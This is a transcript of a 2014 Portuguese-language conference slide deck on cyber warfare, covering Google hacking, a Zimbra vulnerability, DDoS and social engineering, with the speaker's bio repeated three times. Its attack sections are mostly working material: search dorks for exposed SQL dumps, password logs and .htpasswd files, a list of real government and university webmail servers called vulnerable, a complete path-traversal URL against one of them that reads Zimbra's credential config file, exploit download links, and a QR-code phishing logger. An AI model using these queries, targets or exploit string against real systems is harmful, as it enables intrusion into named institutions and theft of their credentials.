guerra cibernética 2.0 - latinoware
DESCRIPTION
Apresentação feita na latinoware de 2014.TRANSCRIPT
Guerra Cibernética 2.0
CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus
Party) Analista de Segurança Sênior, Gestor em Segurança da Informação,
Empreendedor, Especialista em Segurança da Informação a mais de 15 anos.
Doutor em Segurança da Informação Carnegie Mellon;
Mestre em redes computacionais em University of Michigan;
Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie
Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade –
MACKENZIE). Palestrante atuante em diversas instituições no país, e também é
professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical
Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia.
Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação,
Firewall, Stress Testing, analise de Vulnerabilidades.
Dr. Edson Borelli
Estrutura
Hackers
Hackers
➔ Mundiais
➔ Brasileiros
Ransonware!
Ranson…. o que?
Google Hacking
Google Hacking
Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou proteger
melhor as informações de uma empresa. As informações disponíveis nos servidores web da
empresa provavelmente estarão nas bases de dados do Google.
Um servidor mal configurado pode expor diversas informações da empresa no Google. Não é
difícil conseguir acesso a arquivos de base de dados de sites através do Google.
site:gov.br ext:SQL
http://www.governoeletronico.gov.br/scripts_sql_novos_relatorio
s/atualizacao_roles.sql
Google Hacking
Google Hacking
Serviços:
intitle:”VNC Desktop ” inurl:5800
Informações:
filetype:log inurl:”password.log”
Listagem de diretórios:
intitle:”index of” .htpasswd
site:gov intext:”TOP SECRET//” intext:SI|ORCON|NOFORN
filetype:pdf
Google Hacking
www.nasa.gov/index.html.old
Google Hacking
Zimbra 0Day
Zimbra 0day
O Zimbra oferece um software de servidor e cliente de código aberto para
troca de mensagens e colaboração.
Falha de 2013 continua até hoje em vários servidores zimbra, com uma
pequena pesquisa no google (Google Hacking) podemos achar vários
webmail’s zimbra e até então vulneráveis.
Zimbra 0day
inurl: webmail & intext:zimbra
https://webmail.salvador.ba.gov.br/
https://webmail.unifei.edu.br/
https://webmail.seduc.ce.gov.br/zimbra/
http://webmail.une.com.co/zimbra/
Zimbra 0day
http://www.exploit-db.com/exploits/30085/
https://webmail.salvador.ba.gov.br/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxK
eys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../
../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Zimbra 0day
Zimbra 0day
Exploit:
➔ http://www.exploit-db.com/exploits/30085/
➔ http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
Explicação e PoC:
➔ http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-
vulneraveis-em-ano-de-eleicao/
DDoS
http://securityattack.com.br/.attack
DDoS
“O motivo para tudo isso? O
membro que se autointitula
Chronos explicou ao R7, em
entrevista exclusiva.
— A gente decidiu derrubar
todos os TRE e conseguiu. Nós
fazemos isso como protesto a
essa roubalheira que nós
vivemos.”
Engenharia Social
Engenharia Social
A arte de enganar
CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus
Party) Analista de Segurança Sênior, Gestor em Segurança da Informação,
Empreendedor, Especialista em Segurança da Informação a mais de 15 anos.
Doutor em Segurança da Informação Carnegie Mellon;
Mestre em redes computacionais em University of Michigan;
Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie
Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade –
MACKENZIE). Palestrante atuante em diversas instituições no país, e também é
professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical
Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista
em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall,
Stress Testing, analise de Vulnerabilidades.
Dr. Edson Borelli
CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus
Party) Analista de Segurança Sênior, Gestor em Segurança da Informação,
Empreendedor, Especialista em Segurança da Informação a mais de 15 anos.
Doutor em Segurança da Informação Carnegie Mellon;
Mestre em redes computacionais em University of Michigan;
Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie
Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade –
MACKENZIE). Palestrante atuante em diversas instituições no país, e também é
professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical
Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista
em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall,
Stress Testing, analise de Vulnerabilidades.
Dr. Edson Borelli
QR Code
QR CodeLink
➔ http://goo.gl/Iwrj5G
Ver
➔ http://www.bds3c.com/evento/log.php
Apagar
➔ http://www.bds3c.com/evento/log.php?cmd=clear
Engenharia Social
Marketing
Direito
Psicologia
Obrigado!!!
